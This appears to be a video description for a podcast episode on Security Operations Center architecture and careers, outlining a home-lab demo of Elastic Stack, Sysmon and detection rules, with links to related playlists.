In this episode, Prabh sits down with Pratyush to break down SOC (Security Operations Center) architecture and the real skills needed to start and grow a career in SOC — with a live practical demo of building a basic SOC using open-source tools.https://www.linkedin.com/in/pratyush-joshi-3391a0230/Noteshttps://excalidraw.com/#json=uAQ-z09mY63gTK6w0-5uq,rnK-MWtIUPZDl41wHQx7eg🎯 What You’ll Learn in This Podcast✅ SOC architecture explained (end-to-end workflow)✅ How log collection, parsing, and visualization actually works✅ Building a basic SOC using Elastic Stack (ELK)✅ Setting up Windows logging using Sysmon + WinLogBeat✅ Creating detections and alerts inside Elastic✅ Simulating real attacks using Atomic Red Team (MITRE ATT&CK)✅ How SOC tiers work (L1 → L2 → escalation & reporting)✅ How freshers can build practical SOC skills at home for free✅ Why learning a SIEM is the fastest way to understand cybersecurity🧱 SOC Architecture (Simplified)Pratyush explains SOC architecture in a simple way:Endpoints / Servers → Log Forwarder → SIEM (Elastic) → Dashboards → Detection Rules → Alerts → Investigation → ResponseWe cover how a SOC works across:Indexing (storing logs)Visualization (dashboards & searches)Detection rules (logic + thresholds)Alerting (triage & escalation)Response (SOAR/XDR concepts)⚙️ Live Demo: Build a Basic SOC with Elastic Stack (ELK)Pratyush demonstrates how to set up:✅ Elasticsearch + Kibana + LogstashInstallation and configuration basicsYAML configuration (host IPs, ports, security options)Creating Kibana data views and searching logsUnderstanding how logs are indexed and queried🖥️ Windows Telemetry Setup (Sysmon + WinLogBeat)🚨 Detection Engineering: Create Rules + Generate AlertsPratyush shows how to:Write queries to filter suspicious behaviorCreate detection rules inside ElasticTrigger alerts and understand SOC alert pipelinesExample: PowerShell-based suspicious activity detection (concept-level demo)This section is a mini introduction to Detection Engineering for SOC analysts.📈 SOC Career Path (L1 to L2 and Beyond)Pratyush explains the SOC tiers in a simple way:Tier 1 (L1)Monitor alertsValidate true vs false positivesEscalate suspicious incidentsTier 2 (L2)Deep investigationCorrelation across logsReport writing and remediation suggestionsHe also shares why:✅ Programming helps but is not mandatory to start✅ SIEM knowledge is the “core engine” of SOC growth✅ Home labs + practice gives freshers a huge edge🧠 Practical Skills to Become SOC-ReadyWe also discuss how to build real-world SOC habits:Log triage mindsetWriting investigation notesReporting and escalation clarityPracticing rule creation using SigmaLearning from platforms like Let’s Defend (for SOC scenarios)💻 SOC Home Lab Requirements (Minimal Setup)You can run this lab with:✅ 8GB RAM minimum✅ 40–50GB storage✅ VirtualBox / VMware✅ Ubuntu VM + Windows VMNo paid tools needed.SOC Playlisthttps://www.youtube.com/watch?v=zCLlrFZU0M8&list=PL0hT6hgexlYxd24Jb8OE7vZoas-iTcHAcISO 27001 Videohttps://www.youtube.com/watch?v=sQqJH2naU6I&t=1454s&pp=ygUeaXNvIDI3MDAxIGltcGxlbWVudGF0aW9uIHN0ZXBzISO 27001 Implementation Guidehttps://www.youtube.com/watch?v=GBfwk10Hh-o&pp=ygUeaXNvIDI3MDAxIGltcGxlbWVudGF0aW9uIHN0ZXBzGRC Practical Serieshttps://www.youtube.com/playlist?list=PL0hT6hgexlYztA41j1bceTfVagP9mtq28GRC Interviewhttps://www.youtube.com/playlist?list=PL0hT6hgexlYz1Usn1Nrnur6OzVoz59zylInternal Audithttps://www.youtube.com/playlist?list=PL0hT6hgexlYyNWBcGYfabwumCr0GKmLWvStudy with MeTelegram Grouphttps://t.me/Infoseclearning#SOC #ElasticSIEM #CyberSecurity #SecurityOperationsCenter #BlueTeam #Sysmon #AtomicRedTeam #MITREATTACK #socanalyst